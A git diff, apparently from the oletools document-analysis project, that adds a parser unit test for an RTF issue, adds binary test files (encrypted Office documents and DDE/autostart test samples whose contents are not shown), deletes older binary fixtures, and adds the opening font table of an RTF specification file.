diff --git a/tests/rtfobj/test_issue_251.py b/tests/rtfobj/test_issue_251.py
new file mode 100644
index 00000000..9968538f
--- /dev/null
+++ b/tests/rtfobj/test_issue_251.py
@@ -0,0 +1,16 @@
+import unittest, sys, os
+
+from tests.test_utils import testdata_reader
+from oletools import rtfobj
+
+class TestRtfObjIssue251(unittest.TestCase):
+ def test_bin_no_param(self):
+ data = testdata_reader.read('rtfobj/issue_251.rtf')
+ rtfp = rtfobj.RtfObjParser(data)
+ rtfp.parse()
+ objects = rtfp.objects
+
+ self.assertTrue(len(objects) == 1)
+
+if __name__ == '__main__':
+ unittest.main()
diff --git a/tests/test-data/basic/encrypted.docx b/tests/test-data/basic/encrypted.docx
new file mode 100644
index 00000000..0f7a9168
Binary files /dev/null and b/tests/test-data/basic/encrypted.docx differ
diff --git a/tests/test-data/encrypted/autostart-encrypt-standardpassword.xls b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xls
new file mode 100644
index 00000000..65c2ac73
Binary files /dev/null and b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xls differ
diff --git a/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsb b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsb
new file mode 100644
index 00000000..b905d7cb
Binary files /dev/null and b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsb differ
diff --git a/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsm b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsm
new file mode 100644
index 00000000..2b2e1131
Binary files /dev/null and b/tests/test-data/encrypted/autostart-encrypt-standardpassword.xlsm differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xls b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xls
new file mode 100644
index 00000000..c61f12bb
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xls differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsb b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsb
new file mode 100644
index 00000000..3518a20b
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsb differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsm b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsm
new file mode 100644
index 00000000..b9cce05a
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsm differ
diff --git a/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsx b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsx
new file mode 100644
index 00000000..c6772272
Binary files /dev/null and b/tests/test-data/encrypted/dde-test-encrypt-standardpassword.xlsx differ
diff --git a/tests/test-data/encrypted/encrypted.doc b/tests/test-data/encrypted/encrypted.doc
new file mode 100644
index 00000000..cf553d74
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.doc differ
diff --git a/tests/test-data/encrypted/encrypted.docm b/tests/test-data/encrypted/encrypted.docm
new file mode 100644
index 00000000..92d608ae
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.docm differ
diff --git a/tests/test-data/encrypted/encrypted.docx b/tests/test-data/encrypted/encrypted.docx
new file mode 100644
index 00000000..06d9e87b
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.docx differ
diff --git a/tests/test-data/encrypted/encrypted.ppt b/tests/test-data/encrypted/encrypted.ppt
new file mode 100644
index 00000000..86710447
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.ppt differ
diff --git a/tests/test-data/encrypted/encrypted.pptm b/tests/test-data/encrypted/encrypted.pptm
new file mode 100644
index 00000000..f26e0ff4
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.pptm differ
diff --git a/tests/test-data/encrypted/encrypted.pptx b/tests/test-data/encrypted/encrypted.pptx
new file mode 100644
index 00000000..108057ec
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.pptx differ
diff --git a/tests/test-data/encrypted/encrypted.xls b/tests/test-data/encrypted/encrypted.xls
new file mode 100644
index 00000000..75d010aa
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xls differ
diff --git a/tests/test-data/encrypted/encrypted.xlsb b/tests/test-data/encrypted/encrypted.xlsb
new file mode 100644
index 00000000..10fa81e4
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xlsb differ
diff --git a/tests/test-data/encrypted/encrypted.xlsm b/tests/test-data/encrypted/encrypted.xlsm
new file mode 100644
index 00000000..e43e0b0a
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xlsm differ
diff --git a/tests/test-data/encrypted/encrypted.xlsx b/tests/test-data/encrypted/encrypted.xlsx
new file mode 100644
index 00000000..16668578
Binary files /dev/null and b/tests/test-data/encrypted/encrypted.xlsx differ
diff --git a/tests/test-data/msodde-doc/dde-test.doc b/tests/test-data/msodde-doc/dde-test.doc
deleted file mode 100644
index da5562c8..00000000
Binary files a/tests/test-data/msodde-doc/dde-test.doc and /dev/null differ
diff --git a/tests/test-data/msodde-doc/test_document.doc b/tests/test-data/msodde-doc/test_document.doc
deleted file mode 100644
index 2c1768ff..00000000
Binary files a/tests/test-data/msodde-doc/test_document.doc and /dev/null differ
diff --git a/tests/test-data/msodde-doc/test_document.docx b/tests/test-data/msodde-doc/test_document.docx
deleted file mode 100644
index 4dd22657..00000000
Binary files a/tests/test-data/msodde-doc/test_document.docx and /dev/null differ
diff --git a/tests/test-data/msodde/RTF-Spec-1.7.rtf b/tests/test-data/msodde/RTF-Spec-1.7.rtf
new file mode 100644
index 00000000..76f67c08
--- /dev/null
+++ b/tests/test-data/msodde/RTF-Spec-1.7.rtf
@@ -0,0 +1 @@
+{\rtf1\mac\ansicpg10000\uc1 \deff1\deflang1033\deflangfe1033{\upr{\fonttbl{\f0\fnil\fcharset256\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fnil\fcharset256\fprq2{\*\panose 020b0604020202020204}Arial;}
{\f2\fnil\fcharset256\fprq2{\*\panose 02070309020205020404}Courier New;}{\f3\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}Symbol;}{\f4\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Times;}
{\f5\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Helvetica{\*\falt Arial};}{\f6\fnil\fcharset256\fprq2{\*\panose 02000500000000000000}Courier;}{\f7\fnil\fcharset256\fprq2{\*\panose 020b0503030404040204}Geneva;}
{\f8\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Tms Rmn;}{\f9\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}Helv;}{\f10\froman\fcharset77\fprq2{\*\panose 00000000000000000000}MS Serif;}
{\f11\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}MS Sans Serif;}{\f12\fnil\fcharset256\fprq2{\*\panose 02020502060305060204}New York;}{\f13\fswiss\fcharset77\fprq2{\*\panose 00000000000000000000}System;}
{\f14\fnil\fcharset2\fprq2{\*\panose 05020102010804080708}Wingdings;}{\f15\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Roman font face;}{\f16\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Modern font face;}
{\f17\froman\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Roman font face;}{\f18\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}FE Truetype Modern font face;}{\f19\froman\fcharset77\fprq2{\*\panose 00000000000000000000}Century;}
{\f20\froman\fcharset128\fprq1{\*\panose 00000000000000000000}Mincho{\*\falt ??};}{\f21\froman\fcharset129\fprq2{\*\panose 02030600000101010101}Batang{\*\falt ??};}{\f22\fnil\fcharset134\fprq2{\*\panose 02010600030101010101}SimSun{\*\falt ??};}
{\f23\froman\fcharset136\fprq2{\*\panose 02020300000000000000}PMingLiU{\*\falt ????};}{\f24\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}Gothic{\*\falt ?????};}{\f25\fmodern\fcharset129\fprq1{\*\panose 00000000000000000000}Dotum{\*\falt ??};}
{\f26\fmodern\fcharset134\fprq1{\*\panose 00000000000000000000}SimHei{\*\falt ??};}{\f27\fmodern\fcharset136\fprq1{\*\panose 00000000000000000000}MingLiU{\*\falt ???};}
{\f28\fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?? ??};}{\f29\froman\fcharset129\fprq1{\*\panose 00000000000000000000}Gulim{\*\falt ??};}
{\f30\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}MS Gothic{\*\falt ?? ????};}{\f31\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Tahoma;}{\f32\fnil\fcharset256\fprq2{\*\panose 020b0a04020102020204}Arial Black;}
{\f33\fmodern\fcharset256\fprq1{\*\panose 020b0509030504030204}Lucida Sans Typewriter{\*\falt Andale Mono};}{\f34\fnil\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana;}
{\f35\fswiss\fcharset256\fprq2{\*\panose 020b0604030504040204}Verdana Ref{\*\falt Verdana};}{\f36\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}Fixedsys;}{\f37\fmodern\fcharset255\fprq1{\*\panose 00000000000000000000}Terminal;}
{\f38\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Small Fonts;}{\f39\fnil\fcharset2\fprq2{\*\panose 00000000000000000000}Marlett;}{\f40\fswiss\fcharset256\fprq2{\*\panose 020b0504020203020204}News Gothic MT;}
{\f41\fscript\fcharset256\fprq2{\*\panose 03010101010101010101}Lucida Handwriting;}{\f42\fswiss\fcharset256\fprq2{\*\panose 020b0602030504090204}Lucida Sans;}{\f43\fswiss\fcharset256\fprq2{\*\panose 020b0602030504020204}Lucida Sans Unicode;}
{\f44\froman\fcharset256\fprq2{\*\panose 02040602050305030304}Book Antiqua;}{\f45\fswiss\fcharset256\fprq2{\*\panose 020b0502020202020204}Century Gothic;}{\f46\fmodern\fcharset256\fprq1{\*\panose 02010509020102010303}OCR A Extended;}
{\f47\froman\fcharset256\fprq2{\*\panose 02040603050505030304}Calisto MT;}{\f48\fswiss\fcharset256\fprq2{\*\panose 020b0306030101010103}Abadi MT Condensed Light;}{\f49\fswiss\fcharset256\fprq2{\*\panose 020e0705020206020404}Copperplate Gothic Bold;}
{\f50\fswiss\fcharset256\fprq2{\*\panose 020e0507020206020404}Copperplate Gothic Light;}{\f51\fdecor\fcharset256\fprq2{\*\panose 04040403030d02020704}Matisse ITC;}{\f52\fdecor\fcharset256\fprq2{\*\panose 04020404030d07020202}Tempus Sans ITC;}
{\f53\fdecor\fcharset256\fprq2{\*\panose 04040506030f02020702}Westminster;}{\f54\fmodern\fcharset256\fprq1{\*\panose 020b0609040504020204}Lucida Console;}{\f55\fnil\fcharset256\fprq2{\*\panose 030f0702030302020204}Comic Sans MS;}
{\f56\fnil\fcharset256\fprq2{\*\panose 020b0806030902050204}Impact;}{\f57\fnil\fcharset2\fprq2{\*\panose 05030102010509060703}Webdings;}{\f58\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarBats;}
{\f59\fnil\fcharset2\fprq2{\*\panose 00000400000000000000}StarMath;}{\f60\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Arioso;}{\f61\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}ChevaraOutline;}
{\f62\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Chevara;}{\f63\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Conga;}{\f64\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}HelmetCondensed;}
{\f65\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Helmet;}{\f66\fnil\fcharset256\fprq2{\*\panose 00000400000000000000}Timmons;}{\f67\fswiss\fcharset256\fprq2{\*\panose 020e0802040304020204}Albertus Extra Bold;}
{\f68\fswiss\fcharset256\fprq2{\*\panose 020e0602030304020304}Albertus Medium;}{\f69\fswiss\fcharset256\fprq2{\*\panose 020b0603020204030204}Antique Olive;}{\f70\fswiss\fcharset256\fprq2{\*\panose 020b0506020203020204}Arial Narrow;}
{\f71\froman\fcharset256\fprq2{\*\panose 02050604050505020204}Bookman Old Style;}{\f72\froman\fcharset256\fprq2{\*\panose 02040603050505020303}Century Schoolbook;}{\f73\fswiss\fcharset256\fprq2{\*\panose 020b0502050508020304}CG Omega;}
{\f74\froman\fcharset256\fprq2{\*\panose 02020603050405020304}CG Times;}{\f75\froman\fcharset256\fprq2{\*\panose 02040706040705040204}Clarendon Condensed;}{\f76\fscript\fcharset256\fprq2{\*\panose 03030502040406070605}Coronet;}
{\f77\froman\fcharset256\fprq2{\*\panose 02020502050306020203}Garamond;}{\f78\fmodern\fcharset256\fprq1{\*\panose 020b0409020202030204}Letter Gothic;}{\f79\fscript\fcharset256\fprq2{\*\panose 03020702040402020504}Marigold;}
{\f80\fscript\fcharset256\fprq2{\*\panose 03010101010201010101}Monotype Corsiva;}{\f81\fnil\fcharset2\fprq2{\*\panose 01010601010101010101}Monotype Sorts;}{\f82\fswiss\fcharset256\fprq2{\*\panose 020b0603020202030204}Univers;}
{\f83\fswiss\fcharset256\fprq2{\*\panose 020b0606020202060204}Univers Condensed;}{\f84\fnil\fcharset256\fprq2{\*\panose 02040502050405020303}Georgia;}{\f85\fnil\fcharset256\fprq2{\*\panose 020b0603020202020204}Trebuchet MS;}
{\f86\fnil\fcharset256\fprq2{\*\panose 020b0509000000000004}Andale Mono;}{\f87\froman\fcharset256\fprq2{\*\panose 00050102010706020507}Map Symbols;}{\f88\fswiss\fcharset128\fprq2{\*\panose 020b0604020202020204}Arial Unicode MS;}
{\f89\fswiss\fcharset256\fprq2{\*\panose 020b0706040902060204}Haettenschweiler;}{\f90\fnil\fcharset2\fprq2{\*\panose 05000000000000000000}MS Outlook;}{\f91\froman\fcharset2\fprq2{\*\panose 05020102010507070707}Wingdings 2;}
{\f92\froman\fcharset2\fprq2{\*\panose 05040102010807070707}Wingdings 3;}{\f93\fnil\fcharset2\fprq2{\*\panose 02000500000000000000}MT Extra;}{\f94\fswiss\fcharset256\fprq2{\*\panose 020b0602020203020303}HoratioDMed;}
{\f95\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Arabic Transparent;}{\f96\fnil\fcharset178\fprq2{\*\panose 02010000000000000000}Traditional Arabic;}{\f97\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David;}
{\f98\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}David Transparent;}{\f99\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam;}{\f100\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Miriam Fixed;}
{\f101\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Fixed Miriam Transparent;}{\f102\fnil\fcharset177\fprq2{\*\panose 00000000000000000000}Miriam Transparent;}{\f103\fmodern\fcharset177\fprq1{\*\panose 00000009000000000000}Rod;}
{\f104\fmodern\fcharset128\fprq1{\*\panose 00000000000000000000}@MS Mincho;}{\f105\fnil\fcharset134\fprq2{\*\panose 00000000000000000000}@SimSun;}{\f106\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Times New Roman CE;}
{\f107\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Times New Roman Cyr;}{\f108\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Times New Roman Greek;}{\f109\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Times New Roman Tur;}
{\f110\froman\fcharset177\fprq2{\*\panose 00000000000000000000}Times New Roman (Hebrew);}{\f111\froman\fcharset178\fprq2{\*\panose 00000000000000000000}Times New Roman (Arabic);}
{\f112\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Times New Roman Baltic;}{\f113\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial CE;}{\f114\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Cyr;}
{\f115\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Greek;}{\f116\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Tur;}{\f117\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Arial (Hebrew);}
{\f118\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Arial (Arabic);}{\f119\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Baltic;}{\f120\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Courier New CE;}
{\f121\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Courier New Cyr;}{\f122\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Courier New Greek;}{\f123\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Courier New Tur;}
{\f124\fmodern\fcharset177\fprq1{\*\panose 00000000000000000000}Courier New (Hebrew);}{\f125\fmodern\fcharset178\fprq1{\*\panose 00000000000000000000}Courier New (Arabic);}
{\f126\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Courier New Baltic;}{\f127\froman\fcharset256\fprq2{\*\panose 00000000000000000000}Batang Western{\*\falt ??};}
{\f128\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Batang CE{\*\falt ??};}{\f129\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Batang Cyr{\*\falt ??};}
{\f130\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Batang Greek{\*\falt ??};}{\f131\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Batang Tur{\*\falt ??};}
{\f132\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Batang Baltic{\*\falt ??};}{\f133\fnil\fcharset256\fprq2{\*\panose 00000000000000000000}SimSun Western{\*\falt ??};}
{\f134\froman\fcharset256\fprq2{\*\panose 00000000000000000000}PMingLiU Western{\*\falt ????};}{\f135\fmodern\fcharset256\fprq1{\*\panose 00000000000000000000}MS Mincho Western{\*\falt ?? ??};}
{\f136\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}MS Mincho CE{\*\falt ?? ??};}{\f137\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}MS Mincho Cyr{\*\falt ?? ??};}
{\f138\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}MS Mincho Greek{\*\falt ?? ??};}{\f139\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}MS Mincho Tur{\*\falt ?? ??};}
{\f140\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}MS Mincho Baltic{\*\falt ?? ??};}{\f141\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century CE;}{\f142\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Century Cyr;}
{\f143\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Century Greek;}{\f144\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Tur;}{\f145\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Baltic;}
{\f146\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Tahoma CE;}{\f147\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Tahoma Cyr;}{\f148\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Tahoma Greek;}
{\f149\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Tahoma Tur;}{\f150\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Tahoma (Hebrew);}{\f151\fswiss\fcharset178\fprq2{\*\panose 00000000000000000000}Tahoma (Arabic);}
{\f152\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Tahoma Baltic;}{\f153\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Black CE;}{\f154\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Arial Black Cyr;}
{\f155\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Arial Black Greek;}{\f156\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Black Tur;}{\f157\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Black Baltic;}
{\f158\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana CE;}{\f159\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Cyr;}{\f160\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Greek;}
{\f161\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Tur;}{\f162\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Baltic;}{\f163\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Verdana Ref CE{\*\falt Tahoma};}
{\f164\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Verdana Ref Cyr{\*\falt Tahoma};}{\f165\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Verdana Ref Greek{\*\falt Tahoma};}
{\f166\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Verdana Ref Tur{\*\falt Tahoma};}{\f167\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Verdana Ref Baltic{\*\falt Tahoma};}
{\f168\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode CE;}{\f169\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Cyr;}
{\f170\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Greek;}{\f171\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode Tur;}
{\f172\fswiss\fcharset177\fprq2{\*\panose 00000000000000000000}Lucida Sans Unicode (Hebrew);}{\f173\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Book Antiqua CE;}{\f174\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Book Antiqua Cyr;}
{\f175\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Book Antiqua Greek;}{\f176\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Book Antiqua Tur;}{\f177\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Book Antiqua Baltic;}
{\f178\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Century Gothic CE;}{\f179\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Century Gothic Cyr;}{\f180\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Century Gothic Greek;}
{\f181\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Century Gothic Tur;}{\f182\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Century Gothic Baltic;}{\f183\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Lucida Console CE;}
{\f184\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Lucida Console Cyr;}{\f185\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Lucida Console Greek;}{\f186\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Lucida Console Tur;}
{\f187\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Comic Sans MS CE;}{\f188\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Comic Sans MS Cyr;}{\f189\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Comic Sans MS Greek;}
{\f190\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Comic Sans MS Tur;}{\f191\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Comic Sans MS Baltic;}{\f192\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Impact CE;}
{\f193\fswiss\fcharset204\fprq2{\*\panose 00000000000000000000}Impact Cyr;}{\f194\fswiss\fcharset161\fprq2{\*\panose 00000000000000000000}Impact Greek;}{\f195\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Impact Tur;}
{\f196\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Impact Baltic;}{\f197\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold CE;}{\f198\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Tur;}
{\f199\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Extra Bold Baltic;}{\f200\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Albertus Medium CE;}
{\f201\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Albertus Medium Tur;}{\f202\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Albertus Medium Baltic;}{\f203\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Antique Olive CE;}
{\f204\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Antique Olive Tur;}{\f205\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Antique Olive Baltic;}{\f206\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Arial Narrow CE;}
{\f207\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Arial Narrow Tur;}{\f208\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Arial Narrow Baltic;}{\f209\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Bookman Old Style CE;}
{\f210\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Bookman Old Style Cyr;}{\f211\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Bookman Old Style Greek;}
{\f212\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Bookman Old Style Tur;}{\f213\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Bookman Old Style Baltic;}
{\f214\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Century Schoolbook CE;}{\f215\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Century Schoolbook Tur;}
{\f216\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Century Schoolbook Baltic;}{\f217\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}CG Omega CE;}{\f218\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}CG Omega Tur;}
{\f219\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}CG Omega Baltic;}{\f220\froman\fcharset238\fprq2{\*\panose 00000000000000000000}CG Times CE;}{\f221\froman\fcharset162\fprq2{\*\panose 00000000000000000000}CG Times Tur;}
{\f222\froman\fcharset186\fprq2{\*\panose 00000000000000000000}CG Times Baltic;}{\f223\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Clarendon Condensed CE;}{\f224\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Tur;}
{\f225\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Clarendon Condensed Baltic;}{\f226\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Coronet CE;}{\f227\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Coronet Tur;}
{\f228\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Coronet Baltic;}{\f229\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Garamond CE;}{\f230\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Garamond Cyr;}
{\f231\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Garamond Greek;}{\f232\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Garamond Tur;}{\f233\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Garamond Baltic;}
{\f234\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Letter Gothic CE;}{\f235\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Letter Gothic Tur;}{\f236\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Letter Gothic Baltic;}
{\f237\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Marigold CE;}{\f238\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Marigold Tur;}{\f239\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Marigold Baltic;}
{\f240\fscript\fcharset238\fprq2{\*\panose 00000000000000000000}Monotype Corsiva CE;}{\f241\fscript\fcharset204\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Cyr;}
{\f242\fscript\fcharset161\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Greek;}{\f243\fscript\fcharset162\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Tur;}
{\f244\fscript\fcharset186\fprq2{\*\panose 00000000000000000000}Monotype Corsiva Baltic;}{\f245\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers CE;}{\f246\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Tur;}
{\f247\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Baltic;}{\f248\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Univers Condensed CE;}{\f249\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Univers Condensed Tur;}
{\f250\fswiss\fcharset186\fprq2{\*\panose 00000000000000000000}Univers Condensed Baltic;}{\f251\froman\fcharset238\fprq2{\*\panose 00000000000000000000}Georgia CE;}{\f252\froman\fcharset204\fprq2{\*\panose 00000000000000000000}Georgia Cyr;}
{\f253\froman\fcharset161\fprq2{\*\panose 00000000000000000000}Georgia Greek;}{\f254\froman\fcharset162\fprq2{\*\panose 00000000000000000000}Georgia Tur;}{\f255\froman\fcharset186\fprq2{\*\panose 00000000000000000000}Georgia Baltic;}
{\f256\fswiss\fcharset238\fprq2{\*\panose 00000000000000000000}Trebuchet MS CE;}{\f257\fswiss\fcharset162\fprq2{\*\panose 00000000000000000000}Trebuchet MS Tur;}{\f258\fmodern\fcharset238\fprq1{\*\panose 00000000000000000000}Andale Mono CE;}
{\f259\fmodern\fcharset204\fprq1{\*\panose 00000000000000000000}Andale Mono Cyr;}{\f260\fmodern\fcharset161\fprq1{\*\panose 00000000000000000000}Andale Mono Greek;}{\f261\fmodern\fcharset162\fprq1{\*\panose 00000000000000000000}Andale Mono Tur;}
{\f262\fmodern\fcharset186\fprq1{\*\panose 00000000000000000000}Andale Mono Baltic;}{\f263\fswiss\fcharset256\fprq2{\*\panose 00000000000000000000}Arial Unicode MS Western;}
